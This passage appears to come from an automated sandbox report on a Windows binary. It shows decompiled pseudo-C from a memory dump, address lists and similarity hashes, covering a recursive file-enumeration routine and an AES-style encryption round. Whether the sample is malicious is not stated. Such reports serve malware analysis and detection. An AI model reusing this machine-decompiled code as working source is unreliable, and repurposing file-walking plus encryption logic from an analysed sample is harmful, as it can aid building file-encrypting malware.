									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x6f346572
0x6f346579
0x6f34657e
0x6f346584
0x6f346587
0x6f34658d
0x6f346592
0x6f346597
0x6f346597
0x6f34659d
0x6f3465a2
0x6f3465a7
0x6f3465a7
0x6f3465ae
0x6f3465b3
0x6f3465b8
0x6f3465b8
0x6f3465bf
0x6f3465c4
0x6f3465c9
0x6f3465c9
0x6f3465d0
0x6f3465d5
0x6f3465da
0x6f3465da
0x6f3465e2
0x6f3465f2
0x6f346604
0x6f346616
0x6f346629
0x6f34663b
0x6f346643
0x6f346648
0x6f34664d
0x6f34664d
0x6f346654
0x6f346659
0x6f346659
0x6f346660
0x6f346665
0x6f346665
0x6f34666c
0x6f346671
0x6f346671
0x6f346678
0x6f34667d
0x6f34667d
0x6f346687
0x6f346689
0x6f3466c3
0x6f34668b
0x6f346690
0x6f3466b4
0x6f3466bc
0x6f3466b0
0x6f3466b0
0x6f3466c6
0x6f3466cd
0x6f3466cf
0x6f3466f1
0x6f3466f9
0x6f3466fc
0x6f3466fc
0x6f3466fe
0x6f3466fe
0x6f346709
0x6f34670f
0x6f346714
0x6f34671b
0x6f346755
0x6f346760
0x6f346766
0x6f346769
0x6f34676c
0x6f346778
0x6f346780
0x6f34671d
0x6f346720
0x6f34672c
0x6f346732
0x6f346738
0x6f34673b
0x6f346744
0x6f346744
0x6f346783
0x6f346791
0x6f346797
0x6f34679a
0x6f34679f
0x6f3467a1
0x6f3467a4
0x6f3467a4
0x6f3467a9
0x6f3467ab
0x6f3467ae
0x6f3467ae
0x6f3467b3
0x6f3467b5
0x6f3467b8
0x6f3467b8
0x6f3467bd
0x6f3467bf
0x6f3467c2
0x6f3467c2
0x6f3467c7
0x6f3467c9
0x6f3467c9
0x6f3467d6
0x6f3467d9
0x6f346810
0x6f3467db
0x6f3467db
0x6f3467de
0x6f346809
0x6f3467fe
0x6f3467fe
0x6f346812
0x6f34681a
0x6f34681d
0x6f34683c
0x6f346841
0x6f346841
0x6f346843
0x6f346848
0x6f346854
0x6f34684a
0x6f34684d
0x6f34684d
0x6f346859
0x6f346859
0x6f34681f
0x6f346822
0x6f346831
0x00000000
0x6f346831
0x6f346824
0x6f346827
0x6f346829
0x6f346829
0x00000000
0x6f346827
0x6f3467e0
0x6f3467e3
0x6f3467f9
0x00000000
0x6f3467f9
0x6f3467e8
0x6f3467ea
0x6f3467ea
0x6f3467e8
0x00000000
0x6f3467d9
0x6f3466d6
0x6f3466e4
0x6f3466ec
0x00000000
0x6f3466ec
0x6f3466da
0x6f3466df
0x6f3466df
0x00000000
0x6f3466da
0x6f346697
0x6f3466a5
0x6f3466ad
0x00000000
0x6f3466ad
0x6f34669b
0x6f3466a0
0x6f3466a0
0x6f34669b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6F34655F,?,?,00000008,?,?,6F3461F3,00000000), ref: 6F346791

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: a5e61f2a4fa5832b4f98f4afc94d232c2ec4a9b85150ed08b65f12cf43b44750
Instruction ID: 42423f0f53d16ad8af6f08dc1487d6772a5d8ff01c9bb358cf1f404bbc512ecb
Opcode Fuzzy Hash: a5e61f2a4fa5832b4f98f4afc94d232c2ec4a9b85150ed08b65f12cf43b44750
Instruction Fuzzy Hash: BEB14931610608DFDB04CF28C596B95BBE0FF46364F258659E8A9CF2A1C736E992CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6F34188A, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6F34188A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t117;
				signed int _t119;
				signed int _t122;
				signed int _t124;
				void* _t127;
				union _FINDEX_INFO_LEVELS _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				signed int _t136;
				intOrPtr* _t139;
				signed int _t144;
				signed int _t150;
				void* _t156;
				void* _t157;
				signed int _t160;
				intOrPtr _t162;
				void* _t167;
				void* _t168;
				signed int _t170;
				signed int _t173;
				void* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;

				_push(__ecx);
				_t134 = _a4;
				_t2 = _t134 + 1; // 0x1
				_t156 = _t2;
				do {
					_t68 =  *_t134;
					_t134 = _t134 + 1;
				} while (_t68 != 0);
				_push(__edi);
				_t160 = _a12;
				_t136 = _t134 - _t156 + 1;
				_v8 = _t136;
				if(_t136 <=  !_t160) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t160 + 1; // 0x1
					_t127 = _t5 + _t136;
					_t167 = E6F3401B7(_t136, _t127, 1);
					__eflags = _t160;
					if(_t160 == 0) {
						L7:
						_push(_v8);
						_t127 = _t127 - _t160;
						_t73 = E6F344A43(_t167 + _t160, _t127, _a4);
						_t175 = _t174 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t131 = _a16;
							_t119 = E6F341C8B(_t131);
							_v8 = _t119;
							__eflags = _t119;
							if(_t119 == 0) {
								 *( *(_t131 + 4)) = _t167;
								_t170 = 0;
								_t14 = _t131 + 4;
								 *_t14 =  *(_t131 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6F33FEFF(_t167);
								_t170 = _v8;
							}
							E6F33FEFF(0);
							_t122 = _t170;
							goto L4;
						}
					} else {
						_push(_t160);
						_t124 = E6F344A43(_t167, _t127, _a8);
						_t175 = _t174 + 0x10;
						__eflags = _t124;
						if(_t124 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6F3400F7();
							asm("int3");
							_t173 = _t175;
							_t176 = _t175 - 0x298;
							_t75 =  *0x6f36609c; // 0xe80c9ffe
							_v48 = _t75 ^ _t173;
							_t139 = _v32;
							_t157 = _v28;
							_push(_t127);
							_push(0);
							_t162 = _v36;
							_v648 = _t157;
							__eflags = _t139 - _t162;
							if(_t139 != _t162) {
								while(1) {
									_t117 =  *_t139;
									__eflags = _t117 - 0x2f;
									if(_t117 == 0x2f) {
										break;
									}
									__eflags = _t117 - 0x5c;
									if(_t117 != 0x5c) {
										__eflags = _t117 - 0x3a;
										if(_t117 != 0x3a) {
											_t139 = E6F344A90(_t162, _t139);
											__eflags = _t139 - _t162;
											if(_t139 != _t162) {
												continue;
											}
										}
									}
									break;
								}
								_t157 = _v612;
							}
							_t77 =  *_t139;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t128 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t128;
								_v668 = _t128;
								_push(_t167);
								asm("sbb eax, eax");
								_v664 = _t128;
								_v660 = _t128;
								_v640 =  ~(_t78 & 0x000000ff) & _t139 - _t162 + 0x00000001;
								_v656 = _t128;
								_v652 = _t128;
								_t84 = E6F34167A(_t139 - _t162 + 1, _t162,  &_v672, E6F341B96(_t157, __eflags));
								_t177 = _t176 + 0xc;
								asm("sbb eax, eax");
								_t168 = FindFirstFileExW( !( ~_t84) & _v664, _t128,  &_v604, _t128, _t128, _t128);
								__eflags = _t168 - 0xffffffff;
								if(_t168 != 0xffffffff) {
									_t144 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t144;
									_t145 = _t144 >> 2;
									_v644 = _t144 >> 2;
									do {
										_v636 = _t128;
										_v632 = _t128;
										_v628 = _t128;
										_v624 = _t128;
										_v620 = _t128;
										_v616 = _t128;
										_t94 = E6F3415AB( &(_v604.cFileName),  &_v636,  &_v605, E6F341B96(_t157, __eflags));
										_t177 = _t177 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E6F34188A(_t128, _t145, _t162, _t168, _t97, _t162, _v640);
											_t177 = _t177 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t128;
												if(_v616 != _t128) {
													E6F33FEFF(_v628);
													_t98 = _v648;
												}
												_t128 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t145 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t145;
											if(_t145 == 0) {
												goto L35;
											} else {
												__eflags = _t145 - 0x2e;
												if(_t145 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t128;
													if( *((intOrPtr*)(_t97 + 2)) == _t128) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t168);
										goto L44;
										L35:
										__eflags = _v616 - _t128;
										if(_v616 != _t128) {
											E6F33FEFF(_v628);
											_pop(_t145);
										}
										__eflags = FindNextFileW(_t168,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t150 = _v644;
									_t158 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t150 - _t109;
									if(_t150 != _t109) {
										E6F33EB90(_t128, _t162, _t168, _t158 + _t150 * 4, _t109 - _t150, 4, E6F3414E1);
									}
									goto L43;
								} else {
									_push(_v612);
									_t128 = E6F34188A(_t128,  &_v604, _t162, _t168, _t162, _t128, _t128);
								}
								L44:
								__eflags = _v652;
								if(_v652 != 0) {
									E6F33FEFF(_v664);
								}
							} else {
								__eflags = _t139 - _t162 + 1;
								if(_t139 == _t162 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t157);
									E6F34188A(0, _t139, _t162, _t167, _t162, 0, 0);
								}
							}
							__eflags = _v12 ^ _t173;
							return E6F33C65E(_v12 ^ _t173);
						} else {
							goto L7;
						}
					}
				} else {
					_t122 = 0xc;
					L4:
					return _t122;
				}
			}

0x6f34188f
0x6f341890
0x6f341893
0x6f341893
0x6f341896
0x6f341896
0x6f341898
0x6f341899
0x6f34189d
0x6f34189e
0x6f3418a5
0x6f3418a8
0x6f3418ad
0x6f3418b7
0x6f3418b8
0x6f3418b9
0x6f3418bc
0x6f3418c6
0x6f3418ca
0x6f3418cc
0x6f3418e0
0x6f3418e0
0x6f3418e3
0x6f3418ed
0x6f3418f2
0x6f3418f5
0x6f3418f7
0x00000000
0x6f3418f9
0x6f3418f9
0x6f3418fe
0x6f341905
0x6f341908
0x6f34190a
0x6f34191b
0x6f34191d
0x6f34191f
0x6f34191f
0x6f34191f
0x6f34190c
0x6f34190d
0x6f341912
0x6f341915
0x6f341924
0x6f34192a
0x00000000
0x6f34192d
0x6f3418ce
0x6f3418ce
0x6f3418d4
0x6f3418d9
0x6f3418dc
0x6f3418de
0x6f341930
0x6f341932
0x6f341933
0x6f341934
0x6f341935
0x6f341936
0x6f341937
0x6f34193c
0x6f341940
0x6f341942
0x6f341948
0x6f34194f
0x6f341952
0x6f341955
0x6f341958
0x6f341959
0x6f34195a
0x6f34195d
0x6f341963
0x6f341965
0x6f341967
0x6f341967
0x6f341969
0x6f34196b
0x00000000
0x00000000
0x6f34196d
0x6f34196f
0x6f341971
0x6f341973
0x6f34197e
0x6f341980
0x6f341982
0x00000000
0x00000000
0x6f341982
0x6f341973
0x00000000
0x6f34196f
0x6f341984
0x6f341984
0x6f34198a
0x6f34198c
0x6f341992
0x6f341994
0x6f3419b6
0x6f3419b6
0x6f3419b8
0x6f3419ba
0x6f3419c6
0x6f3419c6
0x6f3419bc
0x6f3419bc
0x6f3419be
0x00000000
0x6f3419c0
0x6f3419c0
0x6f3419c2
0x6f3419c4
0x00000000
0x00000000
0x6f3419c4
0x6f3419be
0x6f3419ce
0x6f3419d6
0x6f3419dc
0x6f3419dd
0x6f3419df
0x6f3419e7
0x6f3419ed
0x6f3419f3
0x6f3419f9
0x6f341a0d
0x6f341a12
0x6f341a1d
0x6f341a33
0x6f341a35
0x6f341a38
0x6f341a5b
0x6f341a5b
0x6f341a5d
0x6f341a60
0x6f341a66
0x6f341a66
0x6f341a6c
0x6f341a72
0x6f341a78
0x6f341a7e
0x6f341a84
0x6f341aa5
0x6f341aaa
0x6f341aaf
0x6f341ab3
0x6f341ab9
0x6f341abc
0x6f341acf
0x6f341acf
0x6f341add
0x6f341ae2
0x6f341ae5
0x6f341aeb
0x6f341aed
0x6f341b4b
0x6f341b51
0x6f341b59
0x6f341b5e
0x6f341b64
0x6f341b65
0x00000000
0x00000000
0x00000000
0x6f341abe
0x6f341abe
0x6f341ac1
0x6f341ac3
0x00000000
0x6f341ac5
0x6f341ac5
0x6f341ac8
0x00000000
0x6f341aca
0x6f341aca
0x6f341acd
0x00000000
0x00000000
0x00000000
0x00000000
0x6f341acd
0x6f341ac8
0x6f341ac3
0x6f341b67
0x6f341b68
0x00000000
0x6f341aef
0x6f341aef
0x6f341af5
0x6f341afd
0x6f341b02
0x6f341b02
0x6f341b11
0x6f341b11
0x6f341b19
0x6f341b1f
0x6f341b25
0x6f341b2c
0x6f341b2f
0x6f341b31
0x6f341b41
0x6f341b46
0x00000000
0x6f341a3a
0x6f341a3a
0x6f341a4b
0x6f341a4b
0x6f341b6e
0x6f341b6e
0x6f341b76
0x6f341b7e
0x6f341b83
0x6f341996
0x6f341999
0x6f34199b
0x6f3419b0
0x00000000
0x6f34199d
0x6f34199d
0x6f3419a3
0x6f3419a8
0x6f34199b
0x6f341b8a
0x6f341b95
0x00000000
0x00000000
0x00000000
0x6f3418de
0x6f3418af
0x6f3418b1
0x6f3418b2
0x6f3418b6
0x6f3418b6

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c56d3063ea2b3b788c99b58bc3bd468cedca0c24a65542265797758f9749d9
Instruction ID: cd4f648fdeab6974f45f71f39815beae208b3567efbb1e6ac844889419e18ad5
Opcode Fuzzy Hash: 99c56d3063ea2b3b788c99b58bc3bd468cedca0c24a65542265797758f9749d9
Instruction Fuzzy Hash: 6141A1B5C04618AEDB11DF69CC88AEABBF9AF45304F1442E9E45DD3240EA359E948F60

Uniqueness

Uniqueness Score: -1.00%

Function 6F33B2B0, Relevance: .4, Instructions: 403
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F33B2B0(signed int* __ecx, signed char* __edx, unsigned int* _a4) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				unsigned int _v24;
				signed int _v28;
				unsigned int _v32;
				unsigned int _v36;
				signed int* _t261;
				signed int* _t262;
				unsigned int _t263;
				unsigned int _t269;
				unsigned int _t291;
				unsigned int _t296;
				unsigned int _t310;
				unsigned int _t312;
				signed char _t318;
				unsigned int _t340;
				unsigned int* _t427;
				unsigned int _t496;
				unsigned int _t500;
				unsigned int _t514;
				unsigned int _t521;
				unsigned int _t529;
				unsigned int _t537;
				unsigned int _t568;
				unsigned int _t573;
				unsigned int _t589;
				signed int _t591;
				signed int _t593;

				_t261 = __ecx[1];
				_v8 = (__edx[7] & 0x000000ff) << 8;
				_v8 = _v8 | __edx[6] & 0x000000ff;
				_v8 = _v8 << 8;
				_v8 = _v8 | __edx[5] & 0x000000ff;
				_v8 = _v8 << 8;
				_v8 = _v8 | __edx[4] & 0x000000ff;
				_v8 = _v8 ^ _t261[1];
				_v16 = (__edx[0xb] & 0x000000ff) << 8;
				_t291 = ((((__edx[3] & 0x000000ff) << 0x00000008 | __edx[2] & 0x000000ff) << 0x00000008 | __edx[1] & 0x000000ff) << 0x00000008 |  *__edx & 0x000000ff) ^  *_t261;
				_v20 = _t291;
				_t589 = (((_v16 | __edx[0xa] & 0x000000ff) << 0x00000008 | __edx[9] & 0x000000ff) << 0x00000008 | __edx[8] & 0x000000ff) ^ _t261[2];
				_v12 = (__edx[0xf] & 0x000000ff) << 8;
				_v12 = _v12 | __edx[0xe] & 0x000000ff;
				_v12 = _v12 << 8;
				_v12 = _v12 | __edx[0xd] & 0x000000ff;
				_v12 = _v12 << 8;
				_v16 = _t589;
				_t500 = (_v12 | __edx[0xc] & 0x000000ff) ^ _t261[3];
				_t262 =  &(_t261[4]);
				_t340 = ( *__ecx >> 1) - 1;
				_v12 = _t500;
				_v36 = _t340;
				if(_t340 > 0) {
					do {
						_v24 =  *(0x6f37f690 + (_t500 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_t589 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v8 >> 0x18) * 4) ^  *(0x6f37fa90 + (_t291 & 0x000000ff) * 4) ^  *_t262;
						_v28 =  *(0x6f380690 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37f690 + (_t291 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v16 >> 0x18) * 4) ^  *(0x6f37fa90 + (_v8 & 0x000000ff) * 4) ^ _t262[1];
						_t312 = _v16;
						_v32 =  *(0x6f37f690 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_t291 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v12 >> 0x18) * 4) ^  *(0x6f37fa90 + (_t312 & 0x000000ff) * 4) ^ _t262[2];
						_t318 =  *(0x6f37f690 + (_t312 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v20 >> 0x18) * 4) ^  *(0x6f37fa90 + (_v12 & 0x000000ff) * 4) ^ _t262[3];
						_v20 =  *(0x6f37f690 + (_t318 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_v32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v28 >> 0x18) * 4) ^  *(0x6f37fa90 + (_v24 & 0x000000ff) * 4) ^ _t262[4];
						_v8 =  *(0x6f380690 + (_t318 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37f690 + (_v24 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v32 >> 0x18) * 4);
						_t568 = _v28;
						_t591 = _v8 ^  *(0x6f37fa90 + (_t568 & 0x000000ff) * 4);
						_v8 = _t591;
						_v8 = _t591 ^ _t262[5];
						_v16 =  *(0x6f37f690 + (_t568 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_v24 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_t318 >> 0x18) * 4);
						_t573 = _v32;
						_t593 = _v16 ^  *(0x6f37fa90 + (_t573 & 0x000000ff) * 4);
						_v16 = _t593;
						_v16 = _t593 ^ _t262[6];
						_t589 = _v16;
						_t291 = _v20;
						_t500 =  *(0x6f37f690 + (_t573 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_v28 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v24 >> 0x18) * 4) ^  *(0x6f37fa90 + (_t318 & 0x000000ff) * 4) ^ _t262[7];
						_t496 = _v36 - 1;
						_t262 =  &(_t262[8]);
						_v12 = _t500;
						_v36 = _t496;
					} while (_t496 > 0);
				}
				_v24 =  *(0x6f37f690 + (_t500 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_t589 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v8 >> 0x18) * 4) ^  *(0x6f37fa90 + (_t291 & 0x000000ff) * 4) ^  *_t262;
				_v28 =  *(0x6f380690 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37f690 + (_t291 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_t589 >> 0x18) * 4) ^  *(0x6f37fa90 + (_v8 & 0x000000ff) * 4) ^ _t262[1];
				_t514 = _v16;
				_t296 =  *(0x6f37f690 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_t291 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v12 >> 0x18) * 4) ^  *(0x6f37fa90 + (_t514 & 0x000000ff) * 4) ^ _t262[2];
				_v16 = _t296;
				_t521 =  *(0x6f37f690 + (_t514 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x6f380690 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x6f37e968 + (_v20 >> 0x18) * 4) ^  *(0x6f37fa90 + (_v12 & 0x000000ff) * 4) ^ _t262[3];
				_v36 = _t521;
				_v20 = (( *((_t296 >> 0x00000010 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ ( *((_v28 >> 0x18) + 0x6f37ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_t521 >> 0x00000008 & 0x000000ff) + 0x6f37ed68) & 0x000000ff) << 0x00000008 ^  *((_v24 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ _t262[4];
				_v12 = (( *((_t521 >> 0x00000010 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ ( *((_v16 >> 0x18) + 0x6f37ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_v24 >> 0x00000008 & 0x000000ff) + 0x6f37ed68) & 0x000000ff) << 0x00000008 ^  *((_v28 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ _t262[5];
				_t529 = _v28;
				_t310 = (( *((_v24 >> 0x00000010 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ ( *((_v36 >> 0x18) + 0x6f37ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_t529 >> 0x00000008 & 0x000000ff) + 0x6f37ed68) & 0x000000ff) << 0x00000008 ^  *((_v16 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ _t262[6];
				_t427 = _a4;
				_t537 = (( *((_t529 >> 0x00000010 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ ( *((_v24 >> 0x18) + 0x6f37ed68) & 0x000000ff) << 0x00000008) << 0x00000008 ^  *((_v16 >> 0x00000008 & 0x000000ff) + 0x6f37ed68) & 0x000000ff) << 0x00000008 ^  *((_v36 & 0x000000ff) + 0x6f37ed68) & 0x000000ff ^ _t262[7];
				_t263 = _v20;
				 *_t427 = _t263;
				_t427[0] = _t263 >> 8;
				_t427[0] = _v20 >> 0x10;
				_t427[0] = _v20 >> 0x18;
				_t269 = _v12;
				_t427[1] = _t269;
				_t427[1] = _t269 >> 8;
				_t427[1] = _v12 >> 0x10;
				_t427[1] = _v12 >> 0x18;
				_t427[2] = _t310 >> 8;
				_t427[2] = _t310 >> 0x10;
				_t427[3] = _t537 >> 8;
				_t427[2] = _t310;
				_t427[3] = _t537;
				_t427[2] = _t310 >> 0x18;
				_t427[3] = _t537 >> 0x10;
				_t427[3] = _t537 >> 0x18;
				return 0;
			}

0x6f33b2e0
0x6f33b2e3
0x6f33b2ea
0x6f33b2ed
0x6f33b2f5
0x6f33b2fc
0x6f33b300
0x6f33b309
0x6f33b313
0x6f33b31f
0x6f33b32a
0x6f33b33a
0x6f33b340
0x6f33b347
0x6f33b34e
0x6f33b352
0x6f33b355
0x6f33b362
0x6f33b367
0x6f33b36a
0x6f33b36f
0x6f33b370
0x6f33b373
0x6f33b378
0x6f33b380
0x6f33b3bd
0x6f33b3fc
0x6f33b40a
0x6f33b441
0x6f33b46f
0x6f33b4b3
0x6f33b4dd
0x6f33b4e0
0x6f33b4e9
0x6f33b4f2
0x6f33b4f8
0x6f33b526
0x6f33b529
0x6f33b538
0x6f33b541
0x6f33b54e
0x6f33b557
0x6f33b574
0x6f33b581
0x6f33b584
0x6f33b585
0x6f33b588
0x6f33b58b
0x6f33b58e
0x6f33b380
0x6f33b5d3
0x6f33b611
0x6f33b626
0x6f33b65a
0x6f33b660
0x6f33b686
0x6f33b68f
0x6f33b6dc
0x6f33b72b
0x6f33b72e
0x6f33b776
0x6f33b7b9
0x6f33b7bc
0x6f33b7bf
0x6f33b7c2
0x6f33b7c7
0x6f33b7d0
0x6f33b7d9
0x6f33b7dc
0x6f33b7df
0x6f33b7e5
0x6f33b7ee
0x6f33b7f7
0x6f33b7ff
0x6f33b807
0x6f33b80f
0x6f33b814
0x6f33b81e
0x6f33b825
0x6f33b828
0x6f33b82d
0x6f33b834

Memory Dump Source

Source File: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd0e8c5458a8471a579c68185493aa138fd9f5874d5619b9cc915a4929aa598
Instruction ID: 8340258a955a69519a3936398a3ac703f2d59c9a36f13303a508c880e9e8a55e
Opcode Fuzzy Hash: 8cd0e8c5458a8471a579c68185493aa138fd9f5874d5619b9cc915a4929aa598
Instruction Fuzzy Hash: F40284709041748FDB4CDF6AD4F04BEFBF1EB8A211755829ED5822B782C2386612DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F33B080, Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E6F33B080(void* __ebx, signed int* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				intOrPtr _v292;
				signed int _v296;
				intOrPtr _v300;
				signed int _t81;
				intOrPtr _t85;
				intOrPtr* _t87;
				signed int* _t143;
				signed char _t146;
				signed int _t151;
